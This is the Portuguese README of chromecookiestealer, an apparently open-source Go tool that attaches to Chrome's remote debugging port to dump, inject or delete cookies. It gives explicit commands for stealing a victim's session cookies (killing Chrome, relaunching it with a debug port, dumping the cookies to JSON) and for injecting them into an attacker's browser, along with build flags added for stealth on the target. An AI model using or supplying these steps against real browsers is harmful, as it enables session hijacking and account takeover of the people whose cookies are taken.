
Roubar/Injetar cookies do Chrome através do protocolo DevTools (--remote-debugging-port).
Anexa-se ao Chrome usando seu protocolo Remote DevTools e rouba/injeta/limpa/exclui cookies.
Fortemente inspirado por WhiteChocolateMacademiaNut.
Os cookies são extraídos como objetos JSON usando o próprio formato do Chrome. O mesmo formato é usado para cookies a serem carregados.
Apenas para uso legal.
Roube os cookies de uma vítima:
git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json
Injetar no navegador local do atacante:
# Start Chrome with a debug port, as above.
./chromecookiestealer -clear -inject ./cookies.json
Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:
- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies
Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:
name - Name of the cookies to remove.
url - If specified, deletes all the cookies with the given name where domain
and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path - If specified, deletes only cookies with the exact path.
Filenames may also be "-" for stdin/stdout.
Options:
-chrome URL
Chrome remote debugging URL (default "ws://127.0.0.1:9222")
-clear
Clear browser cookies
-delete file
Name of file containing parameters for cookies to delete
-dump file
Name of file to which to dump stolen cookies
-inject file
Name of file containing cookies to inject
-no-summary
Don't print a summary on exit
-verbose
Enable verbose logging
go build deve ser suficiente. As seguintes opções podem ser definidas
em tempo de compilação com -ldflags '-X main.Foo=bar' para um pouco mais de
discrição no alvo.
Nenhum dos acima é definido por padrão.
O Protocolo Chrome DevTools é um alvo móvel. Pode ser necessário usar uma versão mais recente das bibliotecas chromedp e cdproto caso este programa pare de funcionar. Isso pode ser feito com
go get -u -v all
go mod tidy
go build
o que pode muito bem ter o efeito colateral de quebrar todo o resto.
¯\_(ツ)_/¯
| Variável | Descrição |
|---|
| DumpFile | Nome do arquivo para o qual extrair cookies. Implica -dump |
| InjectFile | Nome do arquivo do qual injetar cookies. Implica -inject |
| DeleteFile | Nome do arquivo com parâmetros descrevendo cookies a excluir. Implica -delete |
| DoClear | Se definido com qualquer valor, implica -clear |